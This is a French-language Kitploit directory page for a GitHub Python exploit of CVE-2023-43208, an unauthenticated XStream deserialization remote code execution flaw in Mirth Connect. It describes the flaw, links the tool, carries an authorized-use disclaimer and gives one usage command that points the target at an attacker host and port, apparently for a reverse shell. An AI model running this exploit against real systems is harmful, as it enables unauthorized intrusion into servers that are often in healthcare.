Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Mirth-Connect-CVE-2023-43208 — Implémentation Python de CVE-2023-43208 Mirth Connect RCE (XStream non authentifié) | Kitploit
Outils/GitHubGitHub/az4rvs/mirth-connect-cve-2023-43208
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubaz4rvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

Implémentation Python de CVE-2023-43208 Mirth Connect RCE (XStream non authentifié)

Voir le dépôt
21il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208 : Exécution de code à distance (RCE) non authentifiée dans NextGen Mirth Connect

Python Version Vulnerability

Cet exploit exploite une vulnérabilité critique de désérialisation dans le moteur XStream de Mirth Connect. Il provient d'un correctif incomplet pour CVE-2023-37679, permettant l'exécution de code arbitraire non authentifiée sur toutes les versions antérieures à 4.4.1.

Utilisation

root@kitploit:~
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>

Avertissement

Ce script d'exploitation est destiné strictement à des fins éducatives et à des audits de sécurité autorisés afin d'aider les défenseurs à atténuer CVE-2023-43208 ; toute utilisation de cet outil contre des cibles non autorisées est illégale et relève de la seule responsabilité de l'utilisateur final. L'auteur fournit ce logiciel « en l'état » sans aucune garantie, décline toute responsabilité en cas d'utilisation abusive ou de dommages, et n'approuve ni n'encourage les activités non autorisées. Utilisez-le à vos risques et périls et uniquement en conformité avec les lois applicables.

Télécharger l’outil